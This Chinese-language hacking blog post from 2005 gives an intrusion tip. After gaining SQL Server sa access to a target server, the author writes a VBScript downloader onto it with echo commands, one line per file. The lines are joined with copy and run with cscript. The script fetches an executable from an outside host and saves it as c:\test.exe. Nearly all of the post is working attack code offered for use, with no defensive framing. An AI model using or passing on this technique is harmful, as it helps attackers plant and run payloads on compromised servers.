Category: 技术文档
2005-11-12 21:17:10 by: h4x0r

入侵中自己总结的技巧集锦

Font Size: Large | Medium | Small
今天论坛消息中有个朋友问我说,在得到了sql server的sa权限后想用echo往服务器上写个文件,执行一次echo却会向文件中输入N句。问我怎么解决。。。其实这个问题我在很早发表在X档案的杂志上说过,我也一直没有什么好的方法。一般你在echo第一句时采用的是“>”这个重定向符时候不会出现上述问题,就是在你第二句echo的时候采用了“>>”重定向符的时候才会出现。因此我采用的是笨办法,因为我一般echo的都是一个短小的vbs脚本用来下载东西的,代码如下:

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.superlone.com/sp.exe", false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = 3
oStr.Type = 1
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", 2

代码很短,为了解决重复echo的问题,我是把每一句都echo到一个文件中去,避免使用“>>”管道符。最后使用copy命令合并。如下:

echo set xmlHTTP = CreateObject("Microsoft.XMLHTTP") >1.txt
echo xmlHTTP.open "GET","http://www.superlone.com/sp.exe", false >2.txt
echo xmlHTTP.send >3.txt
echo contents = xmlHTTP.responseBody >4.txt
echo Set oStr = CreateObject("ADODB.Stream") >5.txt
echo oStr.Mode = 3 >6.txt
echo oStr.Type = 1 >7.txt
echo oStr.Open >8.txt
echo oStr.Write(contents) >9.txt
echo oStr.SaveToFile "c:\\test.exe", 2 >10.txt

然后这样使用copy命令:

copy 1.txt+2.txt+3.txt+4.txt+5.txt+6.txt+7.txt+8.txt+9.txt+10.txt test.vbs

这样就可以生成一个可以执行的test.vbs了,然后使用cscript.exe test.vbs下载我们的文件。
[Last Modified By h4x0r, at 2005-11-12 21:17:58]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=91

There is no comment on this article.

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code